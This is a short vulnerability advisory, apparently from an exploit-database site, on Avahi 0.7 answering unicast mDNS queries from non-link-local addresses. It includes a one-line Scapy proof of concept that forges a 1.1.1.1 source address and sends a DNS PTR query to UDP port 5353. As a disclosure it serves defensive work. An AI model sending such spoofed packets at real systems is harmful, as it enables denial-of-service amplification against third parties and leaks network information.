Avahi 0.7 Denial Of Service Vulnerability

2018-12-01
ID: 100372
CVE: None
Download vulnerable application: None
Avahi-daemon in Avahi through 0.7 inadvertently sends Legacy Unicast
Responses to IPv4 unicast queries with source addresses that are not
link-local, which allows remote attackers to cause a denial of service
(traffic amplification) or obtain potentially sensitive information
via port-5353 UDP packets.
 send(IP(src="1.1.1.1",dst="192.168.1.1")/UDP(sport=53,
dport=5353)/DNS(rd=1,qd=DNSQR(qtype="PTR", qname="_ssh._tcp.local.")))
 Author was notified by his bug tracker:
https://github.com/lathiat/avahi/issues/203
 Regards,
-- 
Krzysztof Burghardt <[email protected]>
http://www.burghardt.pl/
1.1.11-prod (www01)